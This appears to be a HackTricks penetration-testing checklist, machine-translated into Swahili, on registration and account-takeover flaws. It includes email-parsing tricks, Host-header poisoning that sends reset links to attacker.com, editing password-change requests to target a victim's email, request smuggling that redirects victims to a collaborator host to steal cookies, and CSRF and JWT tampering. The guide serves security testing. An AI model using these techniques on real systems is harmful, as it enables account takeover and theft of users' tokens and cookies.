Registration & Takeover Vulnerabilities
Last updated
Last updated
Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jaribu kuunda kwa kutumia jina la mtumiaji lililopo
Angalia kubadilisha barua pepe:
herufi kubwa
+1@
ongeza nukta kwenye barua pepe
wahusika maalum katika jina la barua pepe (%00, %09, %20)
Weka wahusika weusi baada ya barua pepe: test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
Angalia kama unaweza kubaini wakati jina la mtumiaji tayari limeandikishwa ndani ya programu.
Unapounda mtumiaji angalia sera ya nywila (angalia kama unaweza kutumia nywila dhaifu). Katika hali hiyo unaweza kujaribu kujaribu nywila kwa nguvu.
Angalia ukurasa huu kujifunza jinsi ya kujaribu ukatili wa akaunti au kutoa taarifa kupitia SQL Injections katika fomu za usajili.
Wakati umejiandikisha jaribu kubadilisha barua pepe na angalia kama mabadiliko haya yanathibitishwa kwa usahihi au unaweza kuyabadilisha kuwa barua pepe zisizo na mpangilio.
Angalia kama unaweza kutumia barua pepe za muda
Nywila ndefu (>200) inasababisha DoS
Angalia mipaka ya viwango kwenye uundaji wa akaunti
Tumia username@burp_collab.net na uchambue callback
Omba kurejesha nywila kwa anwani yako ya barua pepe
Bonyeza kwenye kiungo cha kurejesha nywila
Usibadilishe nywila
Bonyeza tovuti zozote za 3rd party (mfano: Facebook, twitter)
Kamatia ombi katika Burp Suite proxy
Angalia kama kichwa cha referer kinavuja tokeni ya kurejesha nywila.
Kamatia ombi la kurejesha nywila katika Burp Suite
Ongeza au hariri vichwa vifuatavyo katika Burp Suite : Host: attacker.com
, X-Forwarded-Host: attacker.com
Tuma ombi na kichwa kilichobadilishwa
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Tafuta URL ya kurejesha nywila kulingana na kichwa cha host kama : https://attacker.com/reset-password.php?token=TOKEN
Mshambuliaji lazima aingie kwenye akaunti yao na aende kwenye kipengele cha Badilisha nenosiri.
Anza Burp Suite na uingilie ombi hilo.
Tuma kwenye tab ya repeater na uhariri vigezo: User ID/email
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Token ya kubadilisha nenosiri inapaswa kuundwa kwa nasibu na kuwa ya kipekee kila wakati. Jaribu kubaini kama token hiyo inaisha muda au kama kila wakati ni ile ile, katika baadhi ya matukio algorithm ya uzalishaji ni dhaifu na inaweza kukisiwa. Vigezo vifuatavyo vinaweza kutumika na algorithm.
Timestamp
UserID
Barua pepe ya Mtumiaji
Jina la Kwanza na Jina la Mwisho
Tarehe ya Kuzaliwa
Cryptography
Nambari pekee
Mfuatano mdogo wa token (herufi kati ya [A-Z,a-z,0-9])
Tumia tena token
Tarehe ya kumalizika kwa token
Trigger ombi la kubadilisha nenosiri kwa kutumia API/UI kwa barua pepe maalum e.g: test@mail.com
Kagua jibu la seva na angalia kwa resetToken
Kisha tumia token hiyo katika URL kama https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Jisajili kwenye mfumo kwa jina la mtumiaji linalofanana na jina la mtumiaji wa mwathirika, lakini ukiweka nafasi za wazi kabla na/au baada ya jina la mtumiaji. e.g: "admin "
Omba kubadilisha nenosiri kwa jina lako la mtumiaji la uhalifu.
Tumia token iliyotumwa kwa barua pepe yako na ubadilishe nenosiri la mwathirika.
Unganisha kwenye akaunti ya mwathirika kwa nenosiri jipya.
Jukwaa la CTFd lilikuwa na udhaifu kwa shambulio hili. Tazama: CVE-2020-7245
Pata XSS ndani ya programu au subdomain ikiwa vidakuzi vimewekwa kwenye kikoa cha domain ya mzazi: *.domain.com
Leak vidakuzi vya sasa vya sessions
Thibitisha kama mtumiaji kwa kutumia cookie
1. Tumia smuggler kugundua aina ya HTTP Request Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Tengeneza ombi ambalo litabadilisha POST / HTTP/1.1
na data ifuatayo:
GET http://something.burpcollaborator.net HTTP/1.1 X:
kwa lengo la kufungua upya waathirika kwenda burpcollab na kuiba vidakuzi vyao
3. Ombi la mwisho linaweza kuonekana kama ifuatavyo
Hackerone inaripoti kutumia hitilafu hii * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666
Tengeneza payload kwa CSRF, mfano: “Fomu ya HTML yenye kuwasilisha kiotomatiki kwa mabadiliko ya nenosiri”
Tuma payload
JSON Web Token inaweza kutumika kuthibitisha mtumiaji.
Hariri JWT kwa ID ya Mtumiaji / Barua pepe nyingine
Angalia saini dhaifu ya JWT
Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)